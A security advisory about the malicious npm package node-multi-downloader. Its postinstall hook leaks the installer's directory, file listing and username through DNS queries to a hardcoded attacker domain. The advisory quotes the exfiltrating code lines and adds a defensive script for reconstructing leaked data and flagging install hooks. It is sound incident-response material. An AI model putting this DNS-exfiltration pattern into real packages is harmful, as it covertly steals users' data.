Vulnerability
Malicious code in node-multi-downloader (npm)
---

## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)

On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk through DNS A-record lookups for subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The out-of-band domain is hardcoded on index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`), and index.js line 8 calls ``dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A', ...)`` to transmit the encoded data, so each query name carries a hex chunk in one label and a tag plus sequence index in the next. Encoding data in DNS query names is a well-known way around HTTP egress filtering: the host's recursive resolver forwards the lookup to the authoritative server for the attacker's domain, so the victim needs no direct outbound connection and the leak succeeds even when the query returns no A record. The package metadata (description "RSI package!", anonymous author, release-candidate version) gives no legitimate purpose that would justify reading the installer's filesystem and identity at install time.
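As an added example (not code from the package, from amazon-inspector, or from this advisory), the Node.js script below shows the two things a responder wants after reading the description above: recovering what was leaked from resolver logs that contain query names of the shape `<hexchunk>.<tag><index>.<oob-domain>`, and flagging the install-time lifecycle scripts that give a package code execution during `npm install`. The log lines, the tag strings `cwd` and `usr`, and the package.json are constructed for the example; the advisory does not give the tag names the package actually uses.

```javascript
// Added example, not the package's own code. Reconstructs data leaked through
// DNS query names shaped like <hexchunk>.<tag><index>.<oob-domain>, which is
// the pattern the advisory describes, and lists install hooks in a package.json.
// Tag names ("cwd", "usr"), the log lines and the package.json are constructed.

const OOB_DOMAIN = "uqlyosvp1f9.oob.evilsec.xyz";

// Constructed resolver log: "<epoch> <client> <qtype> <qname>". Chunks arrive
// out of order and an unrelated lookup is mixed in, as in real logs.
const SAMPLE_LOG = `
1700000001 10.0.0.5 A 65762f617070.cwd1.${OOB_DOMAIN}
1700000001 10.0.0.5 A registry.npmjs.org
1700000002 10.0.0.5 A 2f686f6d652f64.cwd0.${OOB_DOMAIN}
1700000002 10.0.0.5 A 616c696365.usr0.${OOB_DOMAIN}
`.trim().split("\n");

function extractQnames(lines) {
  return lines.map((l) => l.trim().split(/\s+/)[3]).filter(Boolean);
}

// Parse one query name; returns null unless it matches the exfil shape.
function parseQuery(qname) {
  const suffix = "." + OOB_DOMAIN;
  if (!qname.toLowerCase().endsWith(suffix)) return null;
  const labels = qname.slice(0, -suffix.length).split(".");
  if (labels.length !== 2) return null;
  const [hex, tagIdx] = labels;
  const m = /^([a-z]+)(\d+)$/i.exec(tagIdx);
  // A DNS label is at most 63 octets, and a hex payload must be even length.
  if (!m || hex.length > 63 || hex.length % 2 !== 0 || !/^[0-9a-f]+$/i.test(hex)) {
    return null;
  }
  return { tag: m[1].toLowerCase(), index: Number(m[2]), hex: hex.toLowerCase() };
}

// Group chunks by tag, order them by index, and hex-decode the leaked strings.
function reassemble(qnames) {
  const byTag = new Map();
  for (const q of qnames) {
    const p = parseQuery(q);
    if (!p) continue;
    if (!byTag.has(p.tag)) byTag.set(p.tag, []);
    byTag.get(p.tag).push(p);
  }
  const out = {};
  for (const [tag, chunks] of byTag) {
    chunks.sort((a, b) => a.index - b.index);
    out[tag] = Buffer.from(chunks.map((c) => c.hex).join(""), "hex").toString("utf8");
  }
  return out;
}

// Lifecycle scripts npm can run automatically while installing a package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Returns [hookName, command] pairs present in a parsed package.json.
function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string").map((h) => [h, scripts[h]]);
}

// Constructed package.json modelled on the advisory's description.
const SAMPLE_PKG = { name: "node-multi-downloader", scripts: { postinstall: "node index.js" } };

if (typeof require !== "undefined" && require.main === module) {
  console.log(reassemble(extractQnames(SAMPLE_LOG)));
  console.log(installHooks(SAMPLE_PKG));
}
```

Run against real resolver logs, `reassemble` tells you exactly which directory, listing and username left the host, which is what the incident record needs. The `installHooks` check is the preventive side: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle scripts from running at all, and any package whose only install hook is `node index.js` with no build step deserves a look at that file before the scripts are re-enabled.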
No CVSS base score from NVD or GHSA and no EPSS score yet. FIRST.org publishes EPSS daily, but coverage is not universal: pre-disclosure CVEs and reserved IDs carry no EPSS score until at least one exploitation signal is recorded. For interim severity, fall back on KEV and exploit signals, and re-check this record once the sources publish.
No exploitation, limited impact or prevalence